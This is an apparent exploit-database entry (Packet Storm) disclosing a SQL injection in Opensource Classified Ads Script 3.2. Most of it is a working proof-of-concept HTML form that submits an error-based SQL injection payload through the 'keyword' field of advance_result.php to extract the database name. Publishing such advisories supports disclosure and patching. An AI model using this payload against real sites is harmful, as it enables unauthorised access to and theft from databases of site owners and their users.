Opensource Classified Ads Script 3.2 SQL Injection

2017-12-12T00:00:00
ID PACKETSTORM:145335
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-12-12T00:00:00

Description

                                        
                                            `<!--  
# # # # #   
# Exploit Title: Opensource Classified Ads Script 3.2 - SQL Injection  
# Dork: N/A  
# Date: 09.12.2017  
# Vendor Homepage: https://www.phpscriptsmall.com/  
# Software Link: https://www.phpscriptsmall.com/product/professional-classified-ads-script/  
# Version: 3.2  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
-->  
<html>  
<body>  
<form action="http://server/advance_result.php" method="post">  
<input value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" onblur="Getback(this);" onclick="doClear(this);" name="keyword" style="font-size:12px; color:#999999;" type="text">  
<input name="adv_search" value="Ver Ayari" id="adv_search" type="submit"></div>  
</form>  
</body>  
</html>  
  
`